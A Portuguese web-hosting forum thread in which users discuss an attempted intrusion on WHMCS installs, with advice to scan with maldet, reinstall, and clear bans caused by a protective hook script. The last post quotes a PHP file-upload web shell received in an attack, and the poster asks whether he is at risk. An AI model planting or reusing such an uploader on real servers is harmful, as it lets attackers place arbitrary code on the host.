Tentativa de invsão no meu WHMCS

[Jesmarcelo]

@megahost

Recomendo passar o maldet no servidor procurando por virus e malware, com isso você irá identificar se ainda tem algo de errado no servidor.

[Helcio]

Valeu Edvan, obrigado.

Se tem alguem aqui que entende de como cuidar do WHMCS é você.

Mas pera aí, se o Matt é o pai...........você é a mãe?????????? :D :blink:

Brincadeirinha, você ó Tio!

Foi só pra descontrair um pouco :rolleyes: , obrigado mesmo.

Editado Janeiro 22, 2012 por Helcio - Complexo WEB

[edvan]

Valeu Edvan, obrigado.

Se tem alguem aqui que entende de como cuidar do WHMCS é você.

Mas pera aí, se o Matt é o pai...........você á mãe?????????? :D :blink:

Foi só pra descontrair um pouco :rolleyes: , obrigado mesmo.

Tá doido é? Anda cheirando orégano? Edita isso!

Não seria melhor tio?

[luis_uendeo]

Tá doido é? Anda cheirando orégano? Edita isso!

Não seria melhor tio?

Deu chilique! KKK

[Helcio]

Deu chilique! KKK

kkkkkkk surto!

Ta bom você é o Tiu!

______________________

Aproveitando....

Não sei se já passaram por isso, mas com o script funcionando (o que o EDVAN criou - xyz.php) eu sou sempre banido quando tento editar os templates de email.

Como posso apagar o ban no banco de dados beleza, mas deu medo de algum cliente ser banido tipo por editar suas infos na area do cliente.

Mas ainda estou usando, vamos ver o que dá.

[Alexandre Duran]

Se eu fosse vc deletaria TODOS os arquivos em seu WHMCS, salvando antes o configuration.php e sua base de dados original. Reinstale tudo a partir da última versão e mude os dados (inclusive nome, usuário e senha) do banco de dados alterando-os em seu configuration.php original.

[Clebson]

Usei a dica do Edvan, e quando estava navegando pelo meu Admin, recebi um block do nada.. Até 2080 :(

[Helcio]

Usei a dica do Edvan, e quando estava navegando pelo meu Admin, recebi um block do nada.. Até 2080 :(

Então amigo, acontece comigo, mas somente quando edito os templates de email.

Basta remover seu ip da tabela TBLBANNEDIPS pelo PHPMyAdmin no banco de dados do seu WHMCS e volta tudo ao normal.

Por via das dúvidas vou manter este script que ao meu ver é muito bom e de fato não recebi mais os "emails malditos" :ph34r:

Valeu Tiu Edvan!

[Clebson]

Sim, eu já removi o IP.

Exatamente, somente quando edita os templates de e-mails.

[Lperez]

Recebi um codigo diferente hoje, e passou batido pelo arquivo criado no includes/hooks/

<?php echo '<form action=" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } ?> )

Será que corro algum risco?

Estou usando a versão 5.03 do WHMCS

Valeu!